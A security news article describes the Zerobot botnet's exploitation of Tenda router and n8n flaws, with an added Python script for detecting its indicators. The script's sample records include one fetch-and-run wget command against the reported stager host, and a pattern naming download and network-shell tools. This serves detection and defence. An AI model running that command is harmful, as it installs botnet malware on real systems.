The Zerobot Botnet Mutates to Hijack Tenda Routers and n8n Automation Hubs
The Zerobot botnet has begun actively exploiting vulnerabilities in Tenda routers and the n8n workflow-automation platform. Akamai researchers identified the campaign in January 2026 after capturing a wave of attacks in their honeypots. These are the first confirmed cases of either flaw being exploited in the wild since the two were disclosed in the second half of 2025.
Built on the Mirai code base, Zerobot targets CVE-2025-7544 and CVE-2025-68613. The first affects Tenda AC1206 routers running firmware 15.03.06.23: a buffer overflow in the setMacFilterCfg handler lets an attacker execute arbitrary code on the router by sending an overlong deviceList parameter. A public proof-of-concept exploit appeared shortly after disclosure, which is what made the bug attractive to the botnet's operators so quickly.
The second flaw sits in n8n's expression evaluation engine. Vulnerable builds range from 0.211.0 up to the patched releases 1.120.4, 1.121.1 and 1.122.0; they allow arbitrary command execution on the host because workflow expressions were not evaluated in a proper sandbox. Critically, no administrative rights are needed: any account that can edit a workflow can trigger it. From there an attacker can read and modify files on the server, dump environment variables that typically hold API keys and service credentials, and set up persistence. Because n8n is commonly used to glue internal services to cloud platforms, a compromised instance is a ready-made pivot for lateral movement across the wider network.
Akamai observed repeated attempts to fetch a script named tol.sh from 144.172.100.228. The script downloads and runs zerobotv9 binaries built for several CPU architectures. The payload is UPX-packed, keeps its strings in encrypted form, and beacons to the command-and-control domain 0bot.qzz.io. Inside it are the familiar Mirai initialization string and a list of user-agent strings the bot rotates through to make its traffic look like ordinary client requests.
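To show how the indicators above translate into detection logic, here is an added example; it is not Akamai's rule set and not code from the report. It scans constructed JSON request records for the stager host and C2 domain, for tol.sh/zerobotv9 fetches made with the download tools the campaign used, and for oversized deviceList values sent to the setMacFilterCfg handler. The record format, the /goform/ and /api/run paths, and the 64-byte deviceList threshold are assumptions.

```python
"""Added example: match request records against the Zerobot indicators named on this page.
The record format, the /goform/ path and the deviceList threshold are assumptions."""
import json
import re
from dataclasses import dataclass

IOC_HOSTS = {"144.172.100.228", "0bot.qzz.io"}   # stager host and C2 domain (from the report)
IOC_FILES = ("tol.sh", "zerobotv9")               # stager script and payload name (from the report)
TENDA_HANDLER = "setMacFilterCfg"                 # handler affected by CVE-2025-7544
DEVICELIST_MAX = 64   # assumption: a legitimate MAC-filter entry is a few dozen bytes

_DEVICELIST_RE = re.compile(r"(?:^|&)deviceList=([^&]*)")
_TOOL_RE = re.compile(r"\b(wget|curl|nc|netcat|socat)\b", re.I)   # fetch tools the campaign used
_HOST_RE = re.compile(r"(?:\d{1,3}\.){3}\d{1,3}|[a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,}", re.I)


@dataclass(frozen=True)
class Hit:
    src: str
    rule: str
    detail: str


def _hosts(text: str) -> set:
    """Extract IPv4 addresses and domain names from free text."""
    return {m.group(0).lower() for m in _HOST_RE.finditer(text)}


def scan_record(rec: dict) -> list:
    hits = []
    src = rec.get("src", "?")
    path, body = rec.get("path", ""), rec.get("body", "")
    text = " ".join(str(rec.get(k, "")) for k in ("path", "body", "ua"))

    # Rule 1: oversized deviceList sent to the Tenda MAC-filter handler.
    if TENDA_HANDLER in path:
        m = _DEVICELIST_RE.search(body)
        if m and len(m.group(1)) > DEVICELIST_MAX:
            hits.append(Hit(src, "tenda-devicelist-overflow",
                            f"deviceList length {len(m.group(1))}"))

    # Rule 2: a known Zerobot host appears anywhere in the request.
    for host in sorted(_hosts(text) & IOC_HOSTS):
        hits.append(Hit(src, "zerobot-ioc-host", host))

    # Rule 3: stager/payload file name together with a download tool.
    lowered = text.lower()
    if any(f in lowered for f in IOC_FILES) and _TOOL_RE.search(text):
        hits.append(Hit(src, "zerobot-stager", next(f for f in IOC_FILES if f in lowered)))
    return hits


def scan(lines) -> list:
    """Parse one JSON record per line; skip blank or malformed lines."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue
        hits.extend(scan_record(rec))
    return hits


# Constructed sample records, not real honeypot traffic.
SAMPLE_RECORDS = [
    {"src": "203.0.113.10", "path": "/goform/setMacFilterCfg",
     "body": "macFilterType=black&deviceList=aa:bb:cc:dd:ee:ff", "ua": "Mozilla/5.0"},
    {"src": "198.51.100.7", "path": "/goform/setMacFilterCfg",
     "body": "macFilterType=black&deviceList=" + "A" * 200, "ua": "Mozilla/5.0"},
    {"src": "198.51.100.7", "path": "/api/run",
     "body": "cmd=cd /tmp; wget http://144.172.100.228/tol.sh -O t; chmod +x t; ./t",
     "ua": "python-requests/2.31"},
    # outbound proxy record from an internal host beaconing to the C2 domain
    {"src": "10.0.0.5", "path": "http://0bot.qzz.io/", "body": "", "ua": "Mozilla/5.0"},
]
SAMPLE_LINES = [json.dumps(r) for r in SAMPLE_RECORDS]

if __name__ == "__main__":
    for h in scan(SAMPLE_LINES):
        print(f"{h.src:15} {h.rule:28} {h.detail}")
```

Feed it real WAF, proxy or honeypot records in the same shape to triage quickly; the deviceList threshold is a heuristic and should be tuned against what your own Tenda devices send, and Akamai's published Snort and YARA rules remain the authoritative signatures.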
According to the report, the operators were active by December 2025 at the latest, initially using netcat and socat to fetch payloads before switching to curl and wget. Alongside the new bugs, Zerobot also scans for old, well-documented vulnerabilities, notably CVE-2017-9841 (PHPUnit), CVE-2021-3129 (Laravel Ignition) and CVE-2022-22947 (Spring Cloud Gateway). This is the standard playbook of a modern botnet: weaponize public disclosures and ready-made exploits as fast as possible and hit targets before administrators get around to patching.
The Zerobot name first appeared in Fortinet's reports in 2022, but it remains unclear whether the same operators are behind this campaign. The ninth version differs sharply from its predecessors in both scale and implementation language, yet it retains Mirai artifacts such as the XOR key 0xDEADBEEF used to encode its string table.
Akamai has published a full set of indicators of compromise, including Snort and YARA rules along with the IP addresses and file hashes involved. The company urges organizations to inventory their Tenda routers and n8n deployments, apply the available patches promptly, and keep these services off the public internet. Note that network isolation alone is not enough for n8n, since the flaw is reachable by any low-privileged user who can edit a workflow; upgrading is the only real fix.